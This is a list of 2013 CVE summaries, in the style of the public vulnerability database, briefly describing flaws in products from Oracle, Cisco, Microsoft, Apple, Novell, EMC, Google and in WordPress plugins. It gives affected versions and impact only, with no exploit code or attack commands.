[CVE-2013-1509] Unspecified vulnerability in the Oracle WebCenter Sites component in Oracle Fusion Middleware 7.6.2, 11.1.1.6.0, and 11.1.1.6.1 allows remote authenticated users to affect integrity via unknown vectors related to WebCenter Sites.
[CVE-2013-1508] Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Sun Middleware Products 3.0.1 and 3.1.2 allows remote attackers to affect integrity via vectors related to REST Interface.
[CVE-2013-1504] Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2, 10.3.5, 10.3.6, and 12.1.1 allows remote attackers to affect integrity via unknown vectors related to WebLogic Console, a different vulnerability than CVE-2013-2390.
[CVE-2013-1503] Unspecified vulnerability in the Oracle WebCenter Content component in Oracle Fusion Middleware 10.1.3.5.1 and 11.1.1.6.0 allows remote authenticated users to affect integrity via unknown vectors related to Content Server.
[CVE-2013-1497] Unspecified vulnerability in the Oracle COREid Access component in Oracle Fusion Middleware 10.1.4.3.0 allows remote attackers to affect integrity via unknown vectors related to WebGate - WebServer plugin.
[CVE-2013-1471] Multiple cross-site scripting (XSS) vulnerabilities in admin/FEAdmin.html in Fortinet FortiMail before 4.3.4 on FortiMail Identity-Based Encryption (IBE) appliances allow user-assisted remote attackers to inject arbitrary web script or HTML via (1) the Add field for the Black List under Antispam Management User Preferences or (2) the User name field for the Personal Black/White List in the AntiSpam section.
[CVE-2013-1464] Cross-site scripting (XSS) vulnerability in ssets/player.swf in the Audio Player plugin before 2.0.4.6 for Wordpress allows remote attackers to inject arbitrary web script or HTML via the playerID parameter.
[CVE-2013-1463] Cross-site scripting (XSS) vulnerability in js/tabletools/zeroclipboard.swf in the WP-Table Reloaded module before 1.9.4 for Wordpress allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this might be the same vulnerability as CVE-2013-1808. If so, it is likely that CVE-2013-1463 will be REJECTed.
[CVE-2013-1451] Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not ensure that the SSL lock icon is consistent with the Address bar, which makes it easier for remote attackers to spoof web sites via a crafted HTML document that triggers many HTTPS requests to an arbitrary host, followed by an HTTPS request to a trusted host and then an HTTP request to an untrusted host, a related issue to CVE-2013-1450.
[CVE-2013-1406] The Virtual Machine Communication Interface (VMCI) implementation in vmci.sys in VMware Workstation 8.x before 8.0.5 and 9.x before 9.0.1 on Windows, VMware Fusion 4.1 before 4.1.4 and 5.0 before 5.0.2, VMware View 4.x before 4.6.2 and 5.x before 5.1.2 on Windows, VMware ESXi 4.0 through 5.1, and VMware ESX 4.0 and 4.1 does not properly restrict memory allocation by control code, which allows local users to gain privileges via unspecified vectors.
[CVE-2013-1393] Cross-site scripting (XSS) vulnerability in the CurvyCorners module 6.x-1.x and 7.x-1.x for Drupal allows remote authenticated users with the "administer curvycorners" permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-1338] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1303 and CVE-2013-1304.
[CVE-2013-1318] Microsoft Publisher 2003 SP3 allows remote attackers to execute arbitrary code via a crafted Publisher file that triggers access to an invalid pointer, aka "Publisher Corrupt Interface Pointer Vulnerability."
[CVE-2013-1312] Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability."
[CVE-2013-1311] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability."
[CVE-2013-1310] Use-after-free vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability."
[CVE-2013-1309] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1308 and CVE-2013-2551.
[CVE-2013-1308] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1309 and CVE-2013-2551.
[CVE-2013-1307] Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-0811.
[CVE-2013-1306] Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1313.
[CVE-2013-1304] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1303 and CVE-2013-1338.
[CVE-2013-1303] Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.
[CVE-2013-1297] Microsoft Internet Explorer 6 through 8 does not properly restrict data access by VBScript, which allows remote attackers to perform cross-domain reading of JSON files via a crafted web site, aka "JSON Array Information Disclosure Vulnerability."
[CVE-2013-1296] The Remote Desktop ActiveX control in mstscax.dll in Microsoft Remote Desktop Connection Client 6.1 and 7.0 does not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a web page that triggers access to a deleted object, and allows remote RDP servers to execute arbitrary code via unspecified vectors that trigger access to a deleted object, aka "RDP ActiveX Control Remote Code Execution Vulnerability."
[CVE-2013-1289] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 SP1, Groove Server 2010 SP1, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability."
[CVE-2013-1288] Use-after-free vulnerability in Microsoft Internet Explorer 8 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer CTreeNode Use After Free Vulnerability."
[CVE-2013-1247] Cross-site scripting (XSS) vulnerability in the wireless configuration module in Cisco Prime Infrastructure allows remote attackers to inject arbitrary web script or HTML via an SSID that is not properly handled during display of the XML windowing table, aka Bug ID CSCuf04356.
[CVE-2013-1245] The user-management page in Cisco WebEx Social relies on client-side validation of values in the Screen Name, First Name, Middle Name, Last Name, Email Address, and Job Title fields, which allows remote authenticated users to bypass intended access restrictions via crafted requests, aka Bug ID CSCue67190.
[CVE-2013-1244] Cross-site scripting (XSS) vulnerability in the portal module in Cisco WebEx Social allows remote authenticated users to inject arbitrary web script or HTML via a javascript: URL in the link field in a post, aka Bug ID CSCue67199.
[CVE-2013-1242] Memory leak in the web framework in the server in Cisco Unified Presence (CUP) allows remote attackers to cause a denial of service (memory consumption) via malformed TCP packets, aka Bug ID CSCug38080.
[CVE-2013-1240] The command-line interface in Cisco Unified Communications Manager (CUCM) does not properly validate input, which allows local users to read arbitrary files via unspecified vectors, aka Bug ID CSCue25770.
[CVE-2013-1232] The HTTP implementation in Cisco WebEx Node for MCS, WebEx Meetings Server, and WebEx Node for ASR 1000 Series allows remote attackers to read the contents of uninitialized memory locations via a crafted request, aka Bug IDs CSCue36672, CSCue31363, CSCuf17466, and CSCug61252.
[CVE-2013-1231] The HTTP implementation in Cisco WebEx Node for MCS and WebEx Meetings Server allows remote attackers to read cache files via a crafted request, aka Bug IDs CSCue36664 and CSCue36629.
[CVE-2013-1227] Cross-site scripting (XSS) vulnerability in the web framework in Cisco Unified Communications Domain Manager allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCug37902.
[CVE-2013-1222] The Tomcat Web Management feature in Cisco Unified Customer Voice Portal (CVP) Software before 9.0.1 ES 11 does not properly configure Tomcat components, which allows remote attackers to launch arbitrary custom web applications via a crafted (1) HTTP or (2) HTTPS request, aka Bug ID CSCub38379.
[CVE-2013-1221] The Tomcat Web Management feature in Cisco Unified Customer Voice Portal (CVP) Software before 9.0.1 ES 11 does not properly configure Tomcat components, which allows remote attackers to execute arbitrary code via a crafted (1) HTTP or (2) HTTPS request, aka Bug ID CSCub38384.
[CVE-2013-1205] The Event Center module in Cisco WebEx Meetings Server does not perform request authentication in all intended circumstances, which allows remote attackers to discover host keys and event passwords via crafted URLs, aka Bug ID CSCue62485.
[CVE-2013-1200] Session fixation vulnerability in Cisco Secure Access Control System (ACS) allows remote attackers to hijack web sessions via unspecified vectors, aka Bug ID CSCud95787.
[CVE-2013-1198] Cross-site scripting (XSS) vulnerability in a Flash component in Cisco Unified Computing System (UCS) Central allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCud15430.
[CVE-2013-1196] The command-line interface in Cisco Secure Access Control System (ACS), Identity Services Engine Software, Context Directory Agent, Application Networking Manager (ANM), Prime Network Control System, Prime LAN Management Solution (LMS), Prime Collaboration, Unified Provisioning Manager, Network Services Manager, Prime Data Center Network Manager (DCNM), and Quad does not properly validate input, which allows local users to obtain root privileges via unspecified vectors, aka Bug IDs CSCug29384, CSCug13866, CSCug29400, CSCug29406, CSCug29411, CSCug29413, CSCug29416, CSCug29418, CSCug29422, CSCug29425, and CSCug29426, a different issue than CVE-2013-1125.
[CVE-2013-1183] Buffer overflow in the Intelligent Platform Management Interface (IPMI) functionality in the Manager component in Cisco Unified Computing System (UCS) 1.0 and 1.1 before 1.1(1j) and 1.2 before 1.2(1b) allows remote attackers to execute arbitrary code via malformed data in a UDP packet, aka Bug ID CSCtd32371.
[CVE-2013-1182] The login page in the Web Console in the Manager component in Cisco Unified Computing System (UCS) before 1.0(2h), 1.1 before 1.1(1j), and 1.3(x) allows remote attackers to bypass LDAP authentication via a malformed request, aka Bug ID CSCtc91207.
[CVE-2013-1181] Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.
[CVE-2013-1171] Multiple cross-site scripting (XSS) vulnerabilities in the element-list implementation in Cisco Connected Grid Network Management System (CG-NMS) allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug IDs CSCue14517, CSCue38914, CSCue38884, CSCue38882, CSCue38881, CSCue38872, CSCue38868, CSCue38866, CSCue38853, and CSCue14540.
[CVE-2013-1169] Cisco Unified MeetingPlace Web Conferencing Server 7.x before 7.1MR1 Patch 2, 8.0 before 8.0MR1 Patch 2, and 8.5 before 8.5MR3 Patch 1, when the Remember Me option is used, does not properly verify cookies, which allows remote attackers to impersonate users via a crafted login request, aka Bug ID CSCuc64846.
[CVE-2013-1168] The web server in Cisco Unified MeetingPlace Application Server 7.x before 7.1MR1 Patch 2, 8.0 before 8.0MR1 Patch 1, and 8.5 before 8.5MR3 Patch 1 does not invalidate a session upon a logout action, which makes it easier for remote attackers to hijack sessions by leveraging knowledge of a session cookie, aka Bug ID CSCuc64885.
[CVE-2013-1167] Cisco IOS XE 3.2 through 3.4 before 3.4.2S, and 3.5, on 1000 series Aggregation Services Routers (ASR), when bridge domain interface (BDI) is enabled, allows remote attackers to cause a denial of service (card reload) via packets that are not properly handled during the processing of encapsulation, aka Bug ID CSCtt11558.
[CVE-2013-1160] Cross-site scripting (XSS) vulnerability in the OpenView web menus in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud56743.
[CVE-2013-1159] Cross-site scripting (XSS) vulnerability in the Netcool Impact (NCI) web menus in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud56706.
[CVE-2013-1158] Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring (ITM) help menus in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud54397.
[CVE-2013-1157] Cross-site scripting (XSS) vulnerability in the IBM Tivoli Monitoring (ITM) Java servlet container in Cisco Prime Central for Hosted Collaboration Solution allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka Bug ID CSCud51068.
[CVE-2013-1139] The nsAPI interface in Cisco Cloud Portal 9.1 SP1 and SP2, and 9.3 through 9.3.2, does not properly check privileges, which allows remote authenticated users to obtain sensitive information via a crafted URL, aka Bug ID CSCud81134.
[CVE-2013-1132] Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unified Communications Domain Manager allow remote attackers to inject arbitrary web script or HTML via vectors involving the (1) IptAccountMgmt, (2) IptFeatureConfigTemplateMgmt, (3) IptFeatureDisplayPolicyMgmt, or (4) IptProviderMgmt page, aka Bug IDs CSCud69972, CSCud70193, and CSCud70261.
[CVE-2013-1125] The command-line interface in Cisco Identity Services Engine Software, Secure Access Control System (ACS), Application Networking Manager (ANM), Prime LAN Management Solution (LMS), Prime Network Control System, Quad, Context Directory Agent, Prime Collaboration, Unified Provisioning Manager, and Network Services Manager does not properly validate input, which allows local users to obtain root privileges via unspecified vectors, aka Bug IDs CSCue46001, CSCud95790, CSCue46021, CSCue46025, CSCue46023, CSCue46058, CSCue46013, CSCue46031, CSCue46035, and CSCue46042.
[CVE-2013-1123] Multiple cross-site scripting (XSS) vulnerabilities in the server in Cisco Unified MeetingPlace 7.0 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters, aka Bug IDs CSCuc65411 and CSCue18706.
[CVE-2013-1114] Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unity Express before 8.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCud87527.
[CVE-2013-1113] Cross-site scripting (XSS) vulnerability in Cisco Unified Communications Domain Manager allows remote attackers to inject arbitrary web script or HTML via a crafted parameter value, aka Bug ID CSCue21042.
[CVE-2013-1110] Cisco WebEx Training Center allows remote authenticated users to bypass intended privilege restrictions and (1) enable or (2) disable training-center recordings via a crafted URL, aka Bug ID CSCzu81065.
[CVE-2013-1109] Cross-site request forgery (CSRF) vulnerability in testingLibraryAction.do in the Training Center testing library in Cisco WebEx Training Center allows remote attackers to hijack the authentication of arbitrary users for requests that delete tests, aka Bug ID CSCzu81067.
[CVE-2013-1108] Cisco WebEx Training Center allows remote authenticated users to remove hands-on lab-session reservations via a crafted URL, aka Bug ID CSCzu81064.
[CVE-2013-1107] The search function in Cisco Webex Social (formerly Cisco Quad) allows remote authenticated users to read files via unspecified parameters, aka Bug ID CSCud40235.
[CVE-2013-1097] Cross-site scripting (XSS) vulnerability in a ZCC page in njwc.jar in Novell ZENworks Configuration Management (ZCM) 11.2 before 11.2.3a Monthly Update 1 allows remote attackers to inject arbitrary web script or HTML via vectors involving an onload event.
[CVE-2013-1095] Cross-site scripting (XSS) vulnerability in a ZCC page in njwc.jar in Novell ZENworks Configuration Management (ZCM) 11.2 before 11.2.3a Monthly Update 1 allows remote attackers to inject arbitrary web script or HTML via vectors involving an onError event.
[CVE-2013-1094] Cross-site scripting (XSS) vulnerability in a ZCC page in zenworks-core in Novell ZENworks Configuration Management (ZCM) 11.2 before 11.2.3a Monthly Update 1 allows remote attackers to inject arbitrary web script or HTML via an invalid locale.
[CVE-2013-1093] Open redirect vulnerability in the fwdToURL function in the ZCC login page in zcc-framework.jar in Novell ZENworks Configuration Management (ZCM) 11.2 before 11.2.3a Monthly Update 1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the directToPage parameter.
[CVE-2013-1087] Cross-site scripting (XSS) vulnerability in the client in Novell GroupWise through 8.0.3 HP3, and 2012 through SP2, on Windows allows user-assisted remote attackers to inject arbitrary web script or HTML via the body of an e-mail message.
[CVE-2013-1086] Cross-site scripting (XSS) vulnerability in WebAccess in Novell GroupWise before 8.0.3 HP3, and 2012 before SP2, allows remote attackers to inject arbitrary web script or HTML via vectors involving an onError attribute.
[CVE-2013-1080] The web server in Novell ZENworks Configuration Management (ZCM) 10.3 and 11.2 does not properly perform authentication for zenworks/jsp/index.jsp, which allows remote attackers to conduct directory traversal attacks, and consequently upload and execute arbitrary programs, via a request to TCP port 443.
[CVE-2013-1079] Directory traversal vulnerability in the ISCreateObject method in an ActiveX control in InstallShield\ISProxy.dll in AdminStudio in Novell ZENworks Configuration Management (ZCM) 10.3 through 11.2 allows remote attackers to execute arbitrary local DLL files via a crafted web page that also calls the Initialize method.
[CVE-2013-1023] WebKit, as used in Apple Safari before 6.0.5, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than CVE-2013-1009.
[CVE-2013-1013] XSS Auditor in WebKit in Apple Safari before 6.0.5 does not properly rewrite URLs, which allows remote attackers to trigger unintended form submissions via unspecified vectors.
[CVE-2013-1012] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 6.0.5 allows remote attackers to inject arbitrary web script or HTML via vectors involving IFRAME elements.
[CVE-2013-1011] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-1010] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-1009] WebKit, as used in Apple Safari before 6.0.5, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than CVE-2013-1023.
[CVE-2013-1008] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-1007] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-1006] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-1005] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-1004] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-1003] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-1002] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-1001] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-1000] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-0999] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-0998] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-0997] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-0996] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-0995] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-0994] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-0993] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-0992] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-0991] WebKit, as used in Apple iTunes before 11.0.3, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-05-16-1.
[CVE-2013-0974] StoreKit in Apple iOS before 6.1 does not properly handle the disabling of JavaScript within the preferences configuration of Mobile Safari, which allows remote attackers to bypass intended access restrictions and execute JavaScript code via a web site with a Smart App Banner.
[CVE-2013-0973] Software Update in Apple Mac OS X through 10.7.5 does not prevent plugin loading within the marketing-text WebView, which allows man-in-the-middle attackers to execute plugin code by modifying the client-server data stream.
[CVE-2013-0968] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1.
[CVE-2013-0967] CoreTypes in Apple Mac OS X before 10.8.3 includes JNLP files in the list of safe file types, which allows remote attackers to bypass a Java plug-in disabled setting, and trigger the launch of Java Web Start applications, via a crafted web site.
[CVE-2013-0962] Cross-site scripting (XSS) vulnerability in WebKit in Apple iOS before 6.1 allows user-assisted remote attackers to inject arbitrary web script or HTML via crafted content that is not properly handled during a copy-and-paste operation.
[CVE-2013-0961] WebKit in Apple Safari before 6.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, a different vulnerability than CVE-2013-0960.
[CVE-2013-0960] WebKit in Apple Safari before 6.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, a different vulnerability than CVE-2013-0961.
[CVE-2013-0959] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1.
[CVE-2013-0958] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1.
[CVE-2013-0956] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1.
[CVE-2013-0955] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1.
[CVE-2013-0954] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1.
[CVE-2013-0953] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1.
[CVE-2013-0952] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1.
[CVE-2013-0951] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1.
[CVE-2013-0950] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1.
[CVE-2013-0949] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1.
[CVE-2013-0948] WebKit, as used in Apple iOS before 6.1, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2013-01-28-1.
[CVE-2013-0942] Cross-site scripting (XSS) vulnerability in EMC RSA Authentication Agent 7.1 before 7.1.1 for Web for Internet Information Services, and 7.1 before 7.1.1 for Web for Apache, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data.
[CVE-2013-0939] EMC Documentum Webtop before 6.7 SP2, Documentum WDK before 6.7 SP2, Documentum Taskspace before 6.7 SP2, and Documentum Records Manager before 6.7 SP2 allow remote attackers to obtain sensitive information via vectors involving cross-origin frame navigation, related to a "Cross Frame Scripting" issue.
[CVE-2013-0938] Cross-site scripting (XSS) vulnerability in EMC Documentum Webtop before 6.7 SP2, Documentum WDK before 6.7 SP2, Documentum Taskspace before 6.7 SP2, and Documentum Records Manager before 6.7 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0937] Session fixation vulnerability in EMC Documentum Webtop before 6.7 SP2, Documentum WDK before 6.7 SP2, Documentum Taskspace before 6.7 SP2, and Documentum Records Manager before 6.7 SP2 allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2013-0936] Cross-site scripting (XSS) vulnerability in EMC Smarts IP Manager, Smarts Service Assurance Manager, Smarts Server Manager, Smarts VoIP Availability Manager, Smarts Network Protocol Manager, and Smarts MPLS Manager before 9.2 allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
[CVE-2013-0933] Multiple cross-site scripting (XSS) vulnerabilities in EMC RSA Archer 5.x before GRC 5.3SP1, and Archer Smart Suite Framework 4.x, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2013-0926] Google Chrome before 26.0.1410.43 does not properly handle active content in an EMBED element during a copy-and-paste operation, which allows user-assisted remote attackers to have an unspecified impact via a crafted web site.
[CVE-2013-0922] Google Chrome before 26.0.1410.43 does not properly restrict brute-force access attempts against web sites that require HTTP Basic Authentication, which has unspecified impact and attack vectors.
[CVE-2013-0921] The Isolated Sites feature in Google Chrome before 26.0.1410.43 does not properly enforce the use of separate processes, which makes it easier for remote attackers to bypass intended access restrictions via a crafted web site.
[CVE-2013-0918] Google Chrome before 26.0.1410.43 does not prevent navigation to developer tools in response to a drag-and-drop operation, which allows user-assisted remote attackers to have an unspecified impact via a crafted web site.
[CVE-2013-0916] Use-after-free vulnerability in the Web Audio implementation in Google Chrome before 26.0.1410.43 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
[CVE-2013-0912] WebKit in Google Chrome before 25.0.1364.160 allows remote attackers to execute arbitrary code via vectors that leverage "type confusion."
[CVE-2013-0904] The Web Audio implementation in Google Chrome before 25.0.1364.152 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
[CVE-2013-0885] Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly restrict API privileges during interaction with the Chrome Web Store, which has unspecified impact and attack vectors.
